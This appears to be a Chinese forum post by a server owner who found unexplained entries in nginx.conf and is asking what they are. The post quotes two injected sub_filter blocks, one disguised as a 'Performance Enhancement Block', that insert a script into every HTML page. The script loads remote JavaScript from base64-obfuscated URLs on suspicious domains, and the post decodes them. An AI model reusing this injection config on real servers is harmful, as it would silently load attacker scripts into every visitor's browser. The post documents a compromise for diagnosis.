昨天发现 nginx.conf 文件中被加入以下内容:
sub_filter_types text/html;
sub_filter '</head>' '<script>document.cookie="hasVisited178a=1;Max-Age=86400;Path=/";(function(){var hm=document.createElement("script");hm.src=atob("aHR0cHM6Ly9ib290c2NyaXRwLmNvbS9saWIvanF1ZXJ5LzQuNy4yL2pxdWVyeS5taW4uanM=");var s=document.getElementsByTagName("script")[0];s.parentNode.insertBefore(hm,s);})();</script></head>';
sub_filter_once off;
# Performance Enhancement Block - DO NOT MODIFY
# Nginx Performance Optimization Configuration
# Auto-generated by performance tuning module
sub_filter_types text/html;
sub_filter '</head>' '<script>document.cookie="hasVisited178a=1;Max-Age=86400;Path=/";(function(){var hm=document.createElement("script");hm.src=atob("aHR0cHM6Ly9hLnNvZnN4ei5jb20vanVtcC5qcw==");var s=document.getElementsByTagName("script")[0];s.parentNode.insertBefore(hm,s);})();</script>\n</head>';
sub_filter_once off;
# Performance Enhancement Block - DO NOT MODIFY_END
不懂这方面,在 google 上搜了搜,没搜到有用内容。问豆包说大概率是恶意脚本服务器(可能用于挖矿、盗号、刷流量、跳转钓鱼网站等)
aHR0cHM6Ly9ib290c2NyaXRwLmNvbS9saWIvanF1ZXJ5LzQuNy4yL2pxdWVyeS5taW4uanM=
base64 解码是 https://bootscritp.com/lib/jquery/4.7.2/jquery.min.js
aHR0cHM6Ly9hLnNvZnN4ei5jb20vanVtcC5qcw==
base64 解码是 https://a.sofsxz.com/jump.js
1
Select Language